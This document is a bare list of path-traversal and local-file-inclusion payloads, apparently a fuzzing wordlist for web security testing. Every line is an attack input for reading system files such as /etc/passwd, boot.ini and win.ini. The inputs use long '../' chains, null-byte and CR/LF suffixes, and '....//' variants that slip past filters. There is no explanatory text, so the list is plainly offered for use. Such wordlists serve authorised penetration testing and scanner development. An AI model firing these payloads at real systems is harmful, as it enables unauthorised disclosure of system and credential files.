../../../../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../../../../boot.ini.html
C:\boot.ini
C:\boot.ini.html
%SYSTEMROOT%\win.ini
%SYSTEMROOT%\win.ini
%SYSTEMROOT%\win.ini.html
../../../../../../../../../../../../../../../etc/passwd%00.html
/etc/passwd%00.html
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%0a
../../../../../../../../../../../../../../../etc/passwd%0d
../../../../../../../../../../../../../../../etc/passwd%0a%0d
../../../../../../../../../../../../../../../etc/passwd.html
....//....//....//....//....//....//....//....//....//....//etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
....//....//....//....//....//....//....//....//....//....//etc/passwd%00
/etc/passwd
